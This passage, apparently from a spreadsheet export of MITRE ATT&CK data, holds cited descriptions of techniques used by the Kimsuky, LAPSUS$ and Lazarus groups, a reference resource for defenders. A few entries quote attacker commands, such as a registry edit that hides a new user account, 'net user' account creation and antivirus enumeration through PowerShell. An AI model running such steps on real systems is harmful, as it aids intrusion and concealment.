    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has obtained exploit code for various CVEs.(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has used RDP to establish persistence.(Citation: CISA AA20-301A Kimsuky)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has deleted the exfiltrated data on disk after transmission. [Kimsuky](https://attack.mitre.org/groups/G0094) has also used an instrumentor script to terminate browser processes running on an infected system and then delete the cookie files on disk.(Citation: Securelist Kimsuky Sept 2013)(Citation: Talos Kimsuky Nov 2021)(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has used FTP to download additional malware to the target machine.(Citation: VirusBulletin Kimsuky October 2019)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has the ability to enumerate all files and directories on an infected system.(Citation: Securelist Kimsuky Sept 2013)(Citation: Talos Kimsuky Nov 2021)(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has collected victim organization information including but not limited to organization hierarchy, functions, press releases, and others.(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has run &lt;code&gt;reg add ‘HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList’ /v&lt;/code&gt; to hide a newly created user.(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has used an information gathering module that will hide an AV software window from the victim.(Citation: Talos Kimsuky Nov 2021)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has downloaded additional scripts, tools, and malware onto victim systems.(Citation: Crowdstrike GTR2020 Mar 2020)(Citation: Talos Kimsuky Nov 2021)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has sent internal spearphishing emails for lateral movement after stealing victim information.(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has used JScript for logging and downloading additional tools.(Citation: VirusBulletin Kimsuky October 2019)(Citation: CISA AA20-301A Kimsuky)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has used a PowerShell-based keylogger as well as a tool called MECHANICAL to log keystrokes.(Citation: EST Kimsuky April 2019)(Citation: Securelist Kimsuky Sept 2013)(Citation: CISA AA20-301A Kimsuky)(Citation: Netscout Stolen Pencil Dec 2018)(Citation: Talos Kimsuky Nov 2021)(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has gathered credentials using [Mimikatz](https://attack.mitre.org/software/S0002) and ProcDump.(Citation: CISA AA20-301A Kimsuky)(Citation: Netscout Stolen Pencil Dec 2018)(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has created accounts with &lt;code&gt;net user&lt;/code&gt;.(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has used a tool called GREASE to add a Windows admin account in order to allow them continued access via RDP.(Citation: Netscout Stolen Pencil Dec 2018)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has staged collected data files under &lt;code&gt;C:\Program Files\Common Files\System\Ole DB\&lt;/code&gt;.(Citation: CISA AA20-301A Kimsuky)(Citation: Talos Kimsuky Nov 2021)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has used e-mail to send exfiltrated data to C2 servers.(Citation: CISA AA20-301A Kimsuky)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has used attempted to lure victims into opening malicious e-mail attachments.(Citation: ThreatConnect Kimsuky September 2020)(Citation: VirusBulletin Kimsuky October 2019)(Citation: CISA AA20-301A Kimsuky)(Citation: Cybereason Kimsuky November 2020)(Citation: Malwarebytes Kimsuky June 2021)(Citation: Talos Kimsuky Nov 2021)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has lured victims into clicking malicious links.(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has developed its own unique malware such as MailFetch.py for use in operations.(Citation: KISA Operation Muzabi)(Citation: Talos Kimsuky Nov 2021)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has disguised services to appear as benign software or related to operating system functions.(Citation: CISA AA20-301A Kimsuky)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has disguised its C2 addresses as the websites of shopping malls, governments, universities, and others.(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has renamed malware to legitimate names such as &lt;code&gt;ESTCommon.dll&lt;/code&gt; or &lt;code&gt;patch.dll&lt;/code&gt;.(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has modified Registry settings for default file associations to enable all macros and for persistence.(Citation: CISA AA20-301A Kimsuky)(Citation: Crowdstrike GTR2020 Mar 2020)(Citation: Talos Kimsuky Nov 2021)(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has used mshta.exe to run malicious scripts on the system.(Citation: EST Kimsuky April 2019)(Citation: CISA AA20-301A Kimsuky)(Citation: Crowdstrike GTR2020 Mar 2020)(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has used a proprietary tool to intercept one time passwords required for two-factor authentication.(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has used the Nirsoft SniffPass network sniffer to obtain passwords sent over non-secure protocols.(Citation: CISA AA20-301A Kimsuky)(Citation: Netscout Stolen Pencil Dec 2018)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has obfuscated binary strings including the use of XOR encryption and Base64 encoding.(Citation: ThreatConnect Kimsuky September 2020)(Citation: VirusBulletin Kimsuky October 2019) [Kimsuky](https://attack.mitre.org/groups/G0094) has also modified the first byte of DLL implants targeting victims to prevent recognition of the executable file format.(Citation: Talos Kimsuky Nov 2021)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has used pass the hash for authentication to remote access software used in C2.(Citation: CISA AA20-301A Kimsuky)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has executed a variety of PowerShell scripts.(Citation: EST Kimsuky April 2019)(Citation: CISA AA20-301A Kimsuky)(Citation: Talos Kimsuky Nov 2021)(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) can gather a list of all processes running on a victim's machine.(Citation: Talos Kimsuky Nov 2021)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has used a file injector DLL to spawn a benign process on the victim's system and inject the malicious payload into it via process hollowing.(Citation: Talos Kimsuky Nov 2021)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has used Win7Elevate to inject malicious code into explorer.exe.(Citation: Securelist Kimsuky Sept 2013)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has used a macOS Python implant to gather data as well as MailFetcher.py code to automatically collect email data.(Citation: CISA AA20-301A Kimsuky)(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has obtained specific Registry keys and values on a compromised host.(Citation: Talos Kimsuky Nov 2021)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has placed scripts in the startup folder for persistence and modified the `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce` Registry key.(Citation: Securelist Kimsuky Sept 2013)(Citation: CISA AA20-301A Kimsuky)(Citation: Crowdstrike GTR2020 Mar 2020)(Citation: Talos Kimsuky Nov 2021)(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has executed malware with &lt;code&gt;regsvr32s&lt;/code&gt;.(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has used a modified TeamViewer client as a command and control channel.(Citation: Securelist Kimsuky Sept 2013)(Citation: Crowdstrike GTR2020 Mar 2020)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has used RDP for direct remote point-and-click access.(Citation: Netscout Stolen Pencil Dec 2018)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has used tools such as the MailFetch mail crawler to collect victim emails (excluding spam) from online services via IMAP.(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has used `rundll32.exe` to execute malicious scripts and malware on a victim's network.(Citation: Talos Kimsuky Nov 2021)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has downloaded additional malware with scheduled tasks.(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has searched for vulnerabilities, tools, and geopolitical trends on Google to target victims.(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has searched for information on the target company's website.(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has checked for the presence of antivirus software with &lt;code&gt;powershell Get-CimInstance -Namespace root/securityCenter2 – classname antivirusproduct&lt;/code&gt;.(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has purchased hosting servers with virtual currency and prepaid cards.(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has used Twitter to monitor potential victims and to prepare targeted phishing e-mails.(Citation: Malwarebytes Kimsuky June 2021)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has created social media accounts to monitor news and security trends as well as potential targets.(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has packed malware with UPX.(Citation: Malwarebytes Kimsuky June 2021)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has used emails containing Word, Excel and/or HWP (Hangul Word Processor) documents in their spearphishing campaigns.(Citation: Zdnet Kimsuky Dec 2018)(Citation: Securelist Kimsuky Sept 2013)(Citation: ThreatConnect Kimsuky September 2020)(Citation: VirusBulletin Kimsuky October 2019)(Citation: Cybereason Kimsuky November 2020)(Citation: Malwarebytes Kimsuky June 2021)(Citation: Talos Kimsuky Nov 2021)(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has sent spearphishing emails containing a link to a document that contained malicious macros or took the victim to an actor-controlled domain.(Citation: EST Kimsuky April 2019)(Citation: Netscout Stolen Pencil Dec 2018)(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has used links in e-mail to steal account information.(Citation: VirusBulletin Kimsuky October 2019)(Citation: Malwarebytes Kimsuky June 2021)(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has enumerated drives, OS type, OS version, and other information using a script or the "systeminfo" command.(Citation: Securelist Kimsuky Sept 2013)(Citation: Talos Kimsuky Nov 2021)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has used `ipconfig/all` to gather network configuration information.(Citation: Talos Kimsuky Nov 2021)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has used an instrumentor script to gather the names of all services running on a victim's system.(Citation: Talos Kimsuky Nov 2021)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has manipulated timestamps for creation or compilation dates to defeat anti-forensics.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has obtained and used tools such as Nirsoft WebBrowserPassVIew, [Mimikatz](https://attack.mitre.org/software/S0002), and [PsExec](https://attack.mitre.org/software/S0029).(Citation: Netscout Stolen Pencil Dec 2018)(Citation: Talos Kimsuky Nov 2021)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has used Blogspot to host malicious content such as beacons, file exfiltrators, and implants.(Citation: Talos Kimsuky Nov 2021)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has used Visual Basic to download malicious payloads.(Citation: ThreatConnect Kimsuky September 2020)(Citation: VirusBulletin Kimsuky October 2019)(Citation: Crowdstrike GTR2020 Mar 2020)(Citation: Talos Kimsuky Nov 2021) [Kimsuky](https://attack.mitre.org/groups/G0094) has also used malicious VBA macros within maldocs disguised as forms that trigger when a victim types any content into the lure.(Citation: Talos Kimsuky Nov 2021)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094)  has used HTTP GET and POST requests for C2.(Citation: Talos Kimsuky Nov 2021)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has hosted content used for targeting efforts via web services such as Blogspot.(Citation: Talos Kimsuky Nov 2021)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has used modified versions of open source PHP web shells to maintain access, often adding "Dinosaur" references within the code.(Citation: CISA AA20-301A Kimsuky)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has executed Windows commands by using `cmd` and running batch scripts.(Citation: Talos Kimsuky Nov 2021)(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has created new services for persistence.(Citation: Securelist Kimsuky Sept 2013)(Citation: CISA AA20-301A Kimsuky)</t>
  </si>
  <si>
    <t>[LAPSUS$](https://attack.mitre.org/groups/G1004) has removed a targeted organization's global admin accounts to lock the organization out of all access.(Citation: MSTIC DEV-0537 Mar 2022)</t>
  </si>
  <si>
    <t>[LAPSUS$](https://attack.mitre.org/groups/G1004) has added the global admin role to accounts they have created in the targeted organization's cloud instances.(Citation: MSTIC DEV-0537 Mar 2022)</t>
  </si>
  <si>
    <t>[LAPSUS$](https://attack.mitre.org/groups/G1004) has gathered detailed knowledge of an organization's supply chain relationships.(Citation: MSTIC DEV-0537 Mar 2022)</t>
  </si>
  <si>
    <t>[LAPSUS$](https://attack.mitre.org/groups/G1004) has created global admin accounts in the targeted organization's cloud instances to gain persistence.(Citation: MSTIC DEV-0537 Mar 2022)</t>
  </si>
  <si>
    <t>[LAPSUS$](https://attack.mitre.org/groups/G1004) has used compromised credentials to access cloud assets within a target organization.(Citation: MSTIC DEV-0537 Mar 2022)</t>
  </si>
  <si>
    <t>[LAPSUS$](https://attack.mitre.org/groups/G1004) has searched public code repositories for exposed credentials.(Citation: MSTIC DEV-0537 Mar 2022)</t>
  </si>
  <si>
    <t>[LAPSUS$](https://attack.mitre.org/groups/G1004) has searched a victim's network for code repositories like GitLab and GitHub to discover further high-privilege account credentials.(Citation: MSTIC DEV-0537 Mar 2022)</t>
  </si>
  <si>
    <t>[LAPSUS$](https://attack.mitre.org/groups/G1004) has searched a victim's network for collaboration platforms like Confluence and JIRA to discover further high-privilege account credentials.(Citation: MSTIC DEV-0537 Mar 2022)</t>
  </si>
  <si>
    <t xml:space="preserve">[LAPSUS$](https://attack.mitre.org/groups/G1004) has created new virtual machines within the target's cloud environment after leveraging credential access to cloud assets.(Citation: MSTIC DEV-0537 Mar 2022) </t>
  </si>
  <si>
    <t>[LAPSUS$](https://attack.mitre.org/groups/G1004) has gathered user identities and credentials to gain initial access to a victim's organization; the group has also called an organization's help desk to reset a target's credentials.(Citation: MSTIC DEV-0537 Mar 2022)</t>
  </si>
  <si>
    <t>[LAPSUS$](https://attack.mitre.org/groups/G1004) has obtained passwords and session tokens with the use of the Redline password stealer.(Citation: MSTIC DEV-0537 Mar 2022)</t>
  </si>
  <si>
    <t>[LAPSUS$](https://attack.mitre.org/groups/G1004) has used DCSync attacks to gather credentials for privilege escalation routines.(Citation: MSTIC DEV-0537 Mar 2022)</t>
  </si>
  <si>
    <t>[LAPSUS$](https://attack.mitre.org/groups/G1004) has deleted the target's systems and resources both on-premises and in the cloud.(Citation: MSTIC DEV-0537 Mar 2022)</t>
  </si>
  <si>
    <t>[LAPSUS$](https://attack.mitre.org/groups/G1004) has searched a victim's network for organization collaboration channels like MS Teams or Slack to discover further high-privilege account credentials.(Citation: MSTIC DEV-0537 Mar 2022)</t>
  </si>
  <si>
    <t>[LAPSUS$](https://attack.mitre.org/groups/G1004) uploaded sensitive files, information, and credentials from a targeted organization for extortion or public release.(Citation: MSTIC DEV-0537 Mar 2022)</t>
  </si>
  <si>
    <t>[LAPSUS$](https://attack.mitre.org/groups/G1004) has deleted the target's systems and resources in the cloud to trigger the organization's incident and crisis response process.(Citation: MSTIC DEV-0537 Mar 2022)</t>
  </si>
  <si>
    <t>[LAPSUS$](https://attack.mitre.org/groups/G1004) has used the AD Explorer tool to enumerate users on a victim's network.(Citation: MSTIC DEV-0537 Mar 2022)</t>
  </si>
  <si>
    <t>[LAPSUS$](https://attack.mitre.org/groups/G1004) has used the AD Explorer tool to enumerate groups on a victim's network.(Citation: MSTIC DEV-0537 Mar 2022)</t>
  </si>
  <si>
    <t>[LAPSUS$](https://attack.mitre.org/groups/G1004) has gathered employee email addresses, including personal accounts, for social engineering and initial access efforts.(Citation: MSTIC DEV-0537 Mar 2022)</t>
  </si>
  <si>
    <t>[LAPSUS$](https://attack.mitre.org/groups/G1004) has set an Office 365 tenant level mail transport rule to send all mail in and out of the targeted organization to the newly created account.(Citation: MSTIC DEV-0537 Mar 2022)</t>
  </si>
  <si>
    <t>[LAPSUS$](https://attack.mitre.org/groups/G1004) has exploited unpatched vulnerabilities on internally accessible servers including JIRA, GitLab, and Confluence for privilege escalation.(Citation: MSTIC DEV-0537 Mar 2022)</t>
  </si>
  <si>
    <t>[LAPSUS$](https://attack.mitre.org/groups/G1004) has gained access to internet-facing systems and applications, including virtual private network (VPN), remote desktop protocol (RDP), and virtual desktop infrastructure (VDI) including Citrix. (Citation: MSTIC DEV-0537 Mar 2022)</t>
  </si>
  <si>
    <t>[LAPSUS$](https://attack.mitre.org/groups/G1004) has gathered detailed information of target employees to enhance their social engineering lures.(Citation: MSTIC DEV-0537 Mar 2022)</t>
  </si>
  <si>
    <t>[LAPSUS$](https://attack.mitre.org/groups/G1004) has gathered detailed knowledge of team structures within a target organization.(Citation: MSTIC DEV-0537 Mar 2022)</t>
  </si>
  <si>
    <t>[LAPSUS$](https://attack.mitre.org/groups/G1004) acquired and used the Redline password stealer in their operations.(Citation: MSTIC DEV-0537 Mar 2022)</t>
  </si>
  <si>
    <t>[LAPSUS$](https://attack.mitre.org/groups/G1004) has replayed stolen session token and passwords to trigger simple-approval MFA prompts in hope of the legitimate user will grant necessary approval.(Citation: MSTIC DEV-0537 Mar 2022)</t>
  </si>
  <si>
    <t>[LAPSUS$](https://attack.mitre.org/groups/G1004) has spammed target users with MFA prompts in the hope that the legitimate user will grant necessary approval.(Citation: MSTIC DEV-0537 Mar 2022)</t>
  </si>
  <si>
    <t>[LAPSUS$](https://attack.mitre.org/groups/G1004) has used Windows built-in tool `ntdsutil` to extract the Active Directory (AD) database.(Citation: MSTIC DEV-0537 Mar 2022)</t>
  </si>
  <si>
    <t>[LAPSUS$](https://attack.mitre.org/groups/G1004) has leverage NordVPN for its egress points when targeting intended victims.(Citation: MSTIC DEV-0537 Mar 2022)</t>
  </si>
  <si>
    <t>[LAPSUS$](https://attack.mitre.org/groups/G1004) has purchased credentials and session tokens from criminal underground forums.(Citation: MSTIC DEV-0537 Mar 2022)</t>
  </si>
  <si>
    <t>[LAPSUS$](https://attack.mitre.org/groups/G1004) has searched a victim's network for collaboration platforms like SharePoint to discover further high-privilege account credentials.(Citation: MSTIC DEV-0537 Mar 2022)</t>
  </si>
  <si>
    <t>[LAPSUS$](https://attack.mitre.org/groups/G1004) has obtained tools such as AD Explorer inspection software for their operations.(Citation: MSTIC DEV-0537 Mar 2022)</t>
  </si>
  <si>
    <t>[LAPSUS$](https://attack.mitre.org/groups/G1004) has accessed internet-facing identity providers such as Azure Active Directory and Okta to target specific organizations.(Citation: MSTIC DEV-0537 Mar 2022)</t>
  </si>
  <si>
    <t>[LAPSUS$](https://attack.mitre.org/groups/G1004) has recruited target organization employees or contractors who provide credentials and approve an associated MFA prompt, or install remote management software onto a corporate workstation, allowing [LAPSUS$](https://attack.mitre.org/groups/G1004) to take control of an authenticated system.(Citation: MSTIC DEV-0537 Mar 2022)</t>
  </si>
  <si>
    <t>[LAPSUS$](https://attack.mitre.org/groups/G1004) has used compromised credentials and/or session tokens to gain access into a victim's VPN, VDI, RDP, and IAMs.(Citation: MSTIC DEV-0537 Mar 2022)</t>
  </si>
  <si>
    <t>[LAPSUS$](https://attack.mitre.org/groups/G1004) has used VPS hosting providers for infrastructure.(Citation: MSTIC DEV-0537 Mar 2022)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) malware WhiskeyDelta-Two contains a function that attempts to rename the administrator’s account.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) malware IndiaIndia obtains and sends to its C2 server the title of the window for each running process. The KilaAlfa keylogger also reports the title of the window in the foreground.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Loaders)(Citation: Novetta Blockbuster Tools)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has compressed exfiltrated data with RAR and used RomeoDelta malware to archive specified directories in .zip format, encrypt the .zip file, and upload it to C2. (Citation: Novetta Blockbuster Loaders)(Citation: Novetta Blockbuster RATs)(Citation: McAfee Lazarus Resurfaces Feb 2018)(Citation: ESET Lazarus Jun 2020)</t>
  </si>
  <si>
    <t>A [Lazarus Group](https://attack.mitre.org/groups/G0032) malware sample encrypts data using a simple byte based XOR operation prior to exfiltration.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Loaders)(Citation: Novetta Blockbuster RATs)(Citation: McAfee Lazarus Resurfaces Feb 2018)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) malware IndiaIndia saves information gathered about the victim to a file that is compressed with Zlib, encrypted, and uploaded to a C2 server.(Citation: Novetta Blockbuster RATs)(Citation: McAfee Lazarus Resurfaces Feb 2018)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has used GitHub as C2, pulling hosted image payloads then committing command execution output to files in specific directories.(Citation: Lazarus APT January 2022)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) malware WhiskeyAlfa-Three modifies sector 0 of the Master Boot Record (MBR) to ensure that the malware will persist even if a victim machine shuts down.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has performed brute force attacks against administrator accounts.(Citation: ESET Lazarus Jun 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Lazarus Group](https://attack.mitre.org/groups/G0032) has routinely deleted log files on a compromised router, including automatic log deletion through the use of the logrotate utility.(Citation: Kaspersky ThreatNeedle Feb 2021) </t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has digitally signed malware and utilities to evade detection.(Citation: ESET Lazarus Jun 2020)(Citation: Lazarus APT January 2022)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has used code signing certificates issued by Sectigo RSA for some of its malware and tools.(Citation: ESET Lazarus Jun 2020)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) keylogger KiloAlfa obtains user tokens from interactive sessions to execute itself with API call &lt;code&gt;CreateProcessAsUserA&lt;/code&gt; under that user's context.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Tools)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has replaced `win_fw.dll`, an internal component that is executed during IDA Pro installation, with a malicious DLL to download and execute a payload.(Citation: ESET Twitter Ida Pro Nov 2021)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has used a custom secure delete function to overwrite file contents with data from heap memory.(Citation: Novetta Blockbuster)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has collected data and files from compromised networks.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Loaders)(Citation: Novetta Blockbuster RATs)(Citation: Kaspersky ThreatNeedle Feb 2021)(Citation: ClearSky Lazarus Aug 2020)(Citation: McAfee Lazarus Jul 2020)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has used shellcode within macros to decrypt and manually map DLLs and shellcode into memory at runtime.(Citation: Lazarus APT January 2022)(Citation: Qualys LolZarus)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has obtained SSL certificates for their C2 domains.(Citation: CISA AppleJeus Feb 2021)</t>
  </si>
  <si>
    <t>Various [Lazarus Group](https://attack.mitre.org/groups/G0032) malware modifies the Windows firewall to allow incoming connections or disable it entirely using [netsh](https://attack.mitre.org/software/S0108). (Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Loaders)(Citation: Novetta Blockbuster Tools)</t>
  </si>
  <si>
    <t xml:space="preserve">[Lazarus Group](https://attack.mitre.org/groups/G0032) malware TangoDelta attempts to terminate various processes associated with McAfee. Additionally, [Lazarus Group](https://attack.mitre.org/groups/G0032) malware SHARPKNOT disables the Microsoft Windows System Event Notification and Alerter services.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Loaders)(Citation: Novetta Blockbuster Tools)(Citation: US-CERT SHARPKNOT June 2018). </t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has used malware like WhiskeyAlfa to overwrite the first 64MB of every drive with a mix of static and random buffers. A similar process is then used to wipe content in logical drives and, finally, attempt to wipe every byte of every sector on every drive. WhiskeyBravo can be used to overwrite the first 4.9MB of physical drives. WhiskeyDelta can overwrite the first 132MB or 1.5MB of each drive with random data from heap memory.(Citation: Novetta Blockbuster Destructive Malware)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) malware SHARPKNOT overwrites and deletes the Master Boot Record (MBR) on the victim's machine and has possessed MBR wiper malware since at least 2009.(Citation: US-CERT SHARPKNOT June 2018)(Citation: Novetta Blockbuster)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has queried an active directory server to obtain the list of accounts, including administrator accounts.(Citation: ESET Lazarus Jun 2020)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has compromised legitimate domains, including those hosted in the US and Italy, for C2.(Citation: McAfee Lazarus Nov 2020)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has acquired domains related to their campaigns to act as distribution points and C2 channels.(Citation: CISA AppleJeus Feb 2021)(Citation: ESET Lazarus Jun 2020)(Citation: Google TAG Lazarus Jan 2021)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) delivered [RATANKBA](https://attack.mitre.org/software/S0241) and other malicious code to victims via a compromised legitimate website.(Citation: RATANKBA)(Citation: Google TAG Lazarus Jan 2021)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has used a custom hashing method to resolve APIs used in shellcode.(Citation: Lazarus APT January 2022)</t>
  </si>
  <si>
    <t>A [Lazarus Group](https://attack.mitre.org/groups/G0032) malware sample performs reflective DLL injection.(Citation: McAfee Lazarus Resurfaces Feb 2018)(Citation: Lazarus APT January 2022)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has created new email accounts for spearphishing operations.(Citation: ESET Lazarus Jun 2020)(Citation: Kaspersky ThreatNeedle Feb 2021)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) collected email addresses belonging to various departments of a targeted organization which were used in follow-on phishing campaigns.(Citation: Kaspersky ThreatNeedle Feb 2021)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has exfiltrated data and files over a C2 channel through its various tools and malware.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Loaders)(Citation: McAfee Lazarus Resurfaces Feb 2018)(Citation: McAfee Lazarus Nov 2020)</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) malware SierraBravo-Two generates an email message via SMTP containing information about newly infected victims.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster RATs)</t>
